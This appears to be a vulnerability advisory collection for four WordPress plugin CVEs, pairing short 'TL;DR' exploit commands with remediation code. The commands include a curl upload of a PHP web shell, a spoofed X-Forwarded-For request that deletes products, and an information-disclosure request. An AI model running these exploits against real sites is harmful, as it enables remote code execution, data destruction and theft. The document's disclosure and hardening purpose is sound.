CVE-2025-12673

The Flex QR Code Generator plugin performs neither a capability check nor any file-type validation in its update_qr_code AJAX handler. An unauthenticated attacker can therefore upload arbitrary files, including executable PHP scripts, into the web-served uploads directory, which leads to remote code execution.

TL;DR Exploits

# Upload PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "logo=@shell.php"

Details

The vulnerability exists in the update_qr_code method of the FlexQrCodeGenerator class. The plugin registers the handler for unauthenticated (nopriv) AJAX requests, and the file sent in the logo field is written into the WordPress uploads directory without any check of its type or extension. Because that directory is served directly by the web server, the uploaded PHP file can then be requested over HTTP and executed.

CVE-2025-12720

The g-FFL Cockpit plugin does not implement proper authorization checks on its queue and process REST API endpoints. The endpoints are gated only by a client-IP check that trusts attacker-controlled HTTP headers, so an unauthenticated user can spoof the allow-listed address and delete arbitrary WooCommerce products.

TL;DR Exploits

TARGET_SITE="http://example.com"
# Queue a delete job for product 105, then trigger processing; both requests
# pass the IP check because the spoofed X-Forwarded-For header is trusted.
curl -X POST "$TARGET_SITE/wp-json/fflcockpit/v1/queue" \
  -H "X-Forwarded-For: 3.212.185.187" \
  -H "Content-Type: application/json" \
  -d '{"action":"delete","products":[{"id":105}]}' && \
curl -X POST "$TARGET_SITE/wp-json/fflcockpit/v1/process" \
  -H "X-Forwarded-For: 3.212.185.187" \
  -H "Content-Type: application/json"

Details

The queue and process REST API endpoints authenticate callers by client IP address rather than by WordPress user. The address comes from get_client_ip(), which reads the X-Forwarded-For and CF-Connecting-IP request headers; both are set by the client, so any value can be supplied. The result is compared against a single IP address hardcoded in the plugin source, so placing that address in either header is enough to pass the check.

CVE-2025-12721

The g-FFL Cockpit plugin does not implement proper authorization checks on the server_status REST API endpoint, allowing unauthenticated users to access sensitive server configuration information, PHP settings, database details, WordPress installation metadata, and active plugin information through an exposed public endpoint.

TL;DR Exploits

TARGET_SITE="http://example.com"
curl -X GET $TARGET_SITE/wp-json/fflcockpit/v1/server_status | jq

Details

The handle_server_status() function in includes/class-sync-endpoint.php retrieves and exposes comprehensive server information without requiring any authentication or capability checks. The endpoint is registered with permission_callback => '__return_true', making it completely accessible to any unauthenticated visitor.
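Both g-FFL Cockpit issues come down to the permission_callback of a REST route. The following is an added example, not the plugin's own code: it shows the header-trusting IP check and the '__return_true' registration the advisories describe, then a registration that authorises the WordPress user instead. The namespace exampleplugin/v1, the function names and the allow-listed address 203.0.113.10 are assumptions for illustration.

```php
<?php
// Added example, not g-FFL Cockpit's own code. The namespace, function
// names and the allow-listed address 203.0.113.10 are assumptions.

// --- Vulnerable: IP "authentication" from client-controlled headers -----
function exampleplugin_get_client_ip_vulnerable() {
    // Each of these headers is set by the HTTP client, not the server, so the
    // first match returns whatever the attacker put in X-Forwarded-For.
    foreach ( array( 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR' ) as $key ) {
        if ( ! empty( $_SERVER[ $key ] ) ) {
            return trim( explode( ',', $_SERVER[ $key ] )[0] );
        }
    }
    return '';
}

function exampleplugin_ip_permission_vulnerable() {
    // Hardcoded address; curl -H "X-Forwarded-For: 203.0.113.10" passes it.
    return exampleplugin_get_client_ip_vulnerable() === '203.0.113.10';
}

// The server_status issue is simpler still: no check at all.
// 'permission_callback' => '__return_true'

// --- Hardened: authorise the WordPress user, not a header -----------------
function exampleplugin_rest_permission( WP_REST_Request $request ) {
    // Satisfied by a logged-in user sending a REST nonce, or by Basic auth
    // with an Application Password; an anonymous caller has no capabilities.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        return new WP_Error( 'rest_forbidden', 'Insufficient permissions.', array( 'status' => 403 ) );
    }
    return true;
}

// Optional defence in depth: an allow-list on REMOTE_ADDR only. Behind a
// reverse proxy, have the proxy set REMOTE_ADDR; never read X-Forwarded-For here.
function exampleplugin_remote_addr_allowed() {
    return in_array( $_SERVER['REMOTE_ADDR'] ?? '', array( '203.0.113.10' ), true );
}

function exampleplugin_rest_permission_with_allowlist( WP_REST_Request $request ) {
    if ( ! exampleplugin_remote_addr_allowed() ) {
        return new WP_Error( 'rest_forbidden', 'Source address not allowed.', array( 'status' => 403 ) );
    }
    return exampleplugin_rest_permission( $request );
}

add_action( 'rest_api_init', function () {
    foreach ( array( 'queue', 'process' ) as $route ) {
        register_rest_route( 'exampleplugin/v1', '/' . $route, array(
            'methods'             => 'POST',
            'callback'            => function ( WP_REST_Request $request ) use ( $route ) {
                return rest_ensure_response( array( 'route' => $route, 'ok' => true ) );
            },
            // Was: 'exampleplugin_ip_permission_vulnerable'
            'permission_callback' => 'exampleplugin_rest_permission_with_allowlist',
        ) );
    }
    register_rest_route( 'exampleplugin/v1', '/server_status', array(
        'methods'             => 'GET',
        'callback'            => function () {
            return rest_ensure_response( array( 'php' => PHP_VERSION ) );
        },
        // Was: '__return_true'
        'permission_callback' => 'exampleplugin_rest_permission',
    ) );
} );
```

With the hardened registration the spoofed-header request from the TL;DR above receives a 403 from the permission callback before the route callback runs, and the IP allow-list, if kept at all, only ever sees the address the web server itself observed.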

CVE-2025-12189

The Bread & Butter IO plugin contains a vulnerability in its image upload functionality that allows an attacker to trick an authenticated administrator into uploading arbitrary files to the server, including PHP web shells, leading to Remote Code Execution (RCE). The vulnerability stems from the uploadImage() function lacking CSRF protection: a crafted request served from an attacker-controlled page is sent by the administrator's browser with the administrator's session cookies and is processed as if the administrator had submitted it.

The vulnerability exists in the uploadImage() function in /bread-butter/src/Base/Ajax.php, which lacks both file-type validation and CSRF protection and uses file_put_contents() to write the supplied file directly into the WordPress uploads directory before any security checks run.
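The Flex QR Code Generator and Bread & Butter IO issues above share one shape: an AJAX handler that copies an uploaded file into the uploads directory with no nonce, no capability check and no type validation. The following is an added example, not either plugin's code: the vulnerable pattern as the advisories describe it, beside a handler that closes all three gaps. The action name exampleplugin_upload, the logo field and the nonce name are assumptions for illustration.

```php
<?php
// Added example, not Flex QR Code Generator's or Bread & Butter IO's own code.
// The hook/action names (exampleplugin_*) and the nonce name are assumptions.

// --- Vulnerable pattern --------------------------------------------------
// Reachable by anyone (wp_ajax_nopriv_), no nonce (CSRF), no capability check,
// and the file is written verbatim into the web-served uploads folder.
add_action( 'wp_ajax_nopriv_exampleplugin_upload', 'exampleplugin_upload_vulnerable' );
add_action( 'wp_ajax_exampleplugin_upload',        'exampleplugin_upload_vulnerable' );

function exampleplugin_upload_vulnerable() {
    $upload_dir = wp_upload_dir();
    $dest       = $upload_dir['basedir'] . '/' . basename( $_FILES['logo']['name'] );
    // shell.php lands in wp-content/uploads/shell.php and runs when requested.
    file_put_contents( $dest, file_get_contents( $_FILES['logo']['tmp_name'] ) );
    wp_send_json_success( array( 'path' => $dest ) );
}

// --- Hardened handler ----------------------------------------------------
// 1. No nopriv hook: anonymous requests never reach the function.
// 2. check_ajax_referer() requires a nonce bound to this action (stops CSRF).
// 3. current_user_can() requires the upload_files capability (stops low-priv users).
// 4. wp_handle_upload() enforces the MIME allow-list; .php is rejected before
//    anything is written under the uploads directory.
add_action( 'wp_ajax_exampleplugin_upload', 'exampleplugin_upload_hardened' );

function exampleplugin_upload_hardened() {
    check_ajax_referer( 'exampleplugin_upload', '_wpnonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( empty( $_FILES['logo'] ) || $_FILES['logo']['error'] !== UPLOAD_ERR_OK ) {
        wp_send_json_error( 'no file', 400 );
    }
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload(
        $_FILES['logo'],
        array(
            'test_form' => false,
            'mimes'     => array(
                'png'      => 'image/png',
                'jpg|jpeg' => 'image/jpeg',
            ),
        )
    );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 415 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```

The legitimate front end obtains the nonce with wp_create_nonce( 'exampleplugin_upload' ) and sends it as _wpnonce; a cross-site form cannot read it, so the CSRF request from the Bread & Butter scenario dies at the first line, and the unauthenticated curl from the Flex QR scenario never reaches the handler at all because only the wp_ajax_ (logged-in) hook is registered.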

CVE-2025-13390

The WP Directory Kit plugin for WordPress, version 1.4.4 and below, contains an authentication bypass in its auto-login functionality. The vulnerability allows unauthenticated attackers to gain administrative access to WordPress sites by exploiting a cryptographically broken token generation mechanism. The auto-login feature cannot be disabled, and its token is the MD5 hash of the user ID alone, with no secret and no expiry, so anyone can compute the token for any user.

TL;DR Exploits

The CVE-2025-13390.sh script uploads a web shell plugin to a target site, assuming user ID 1 is an administrator.
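An auto-login token that is a pure function of a public, sequential integer is forgeable by construction. The following is an added example, not WP Directory Kit's code: the md5(user_id) scheme the advisory describes, beside an issue/verify pair that is keyed with a site secret, expires, is single-use and is off unless an administrator enables it. The function names, the query parameters (uid, exp, nonce, mac) and the exampleplugin_autologin option are assumptions for illustration.

```php
<?php
// Added example, not WP Directory Kit's own code. Function names, the
// query parameters and the 'exampleplugin_autologin' option are assumptions.

// --- Vulnerable pattern --------------------------------------------------
// No secret, no expiry, cannot be switched off: md5('1') is the constant
// c4ca4238a0b923820dcc509a6f75849b, which every attacker can compute offline.
function exampleplugin_autologin_token_vulnerable( $user_id ) {
    return md5( (string) $user_id );
}

function exampleplugin_autologin_vulnerable() {
    $user_id = (int) ( $_GET['uid'] ?? 0 );
    if ( isset( $_GET['token'] ) && $_GET['token'] === exampleplugin_autologin_token_vulnerable( $user_id ) ) {
        wp_set_auth_cookie( $user_id );   // ?uid=1&token=c4ca4238... logs in as user 1
    }
}

// --- Hardened version ----------------------------------------------------
// Token = HMAC-SHA256 over (user_id, expiry, random nonce) keyed with the
// site's auth salt. Issue only from an authenticated admin action.
function exampleplugin_autologin_issue( $user_id, $ttl = 300 ) {
    $user_id = (int) $user_id;
    $expires = time() + $ttl;
    $nonce   = bin2hex( random_bytes( 16 ) );
    $mac     = hash_hmac( 'sha256', "$user_id|$expires|$nonce", wp_salt( 'auth' ) );
    // Remember the nonce so the link can be redeemed exactly once.
    set_transient( 'exampleplugin_al_' . $nonce, $user_id, $ttl );
    return compact( 'user_id', 'expires', 'nonce', 'mac' );
}

function exampleplugin_autologin_verify( $user_id, $expires, $nonce, $mac ) {
    if ( ! get_option( 'exampleplugin_autologin' ) ) {
        return false;                           // feature is off by default
    }
    $user_id = (int) $user_id;
    $expires = (int) $expires;
    if ( ! ctype_xdigit( (string) $nonce ) || $expires < time() ) {
        return false;                           // malformed or expired
    }
    $expected = hash_hmac( 'sha256', "$user_id|$expires|$nonce", wp_salt( 'auth' ) );
    if ( ! hash_equals( $expected, (string) $mac ) ) {
        return false;                           // forged or tampered (constant-time compare)
    }
    if ( (int) get_transient( 'exampleplugin_al_' . $nonce ) !== $user_id ) {
        return false;                           // already used or never issued
    }
    delete_transient( 'exampleplugin_al_' . $nonce );
    return true;
}

function exampleplugin_autologin_hardened() {
    $p = wp_unslash( $_GET );
    if ( exampleplugin_autologin_verify( $p['uid'] ?? 0, $p['exp'] ?? 0, $p['nonce'] ?? '', $p['mac'] ?? '' ) ) {
        wp_set_auth_cookie( (int) $p['uid'] );
        wp_safe_redirect( admin_url() );
        exit;
    }
    wp_die( 'Invalid or expired login link', '', array( 'response' => 403 ) );
}
```

Without wp_salt( 'auth' ) the attacker cannot produce a valid mac for any uid, hash_equals() removes the timing side channel on the comparison, the transient makes each link single-use, and because the option defaults to off the feature does not exist on sites that never asked for it.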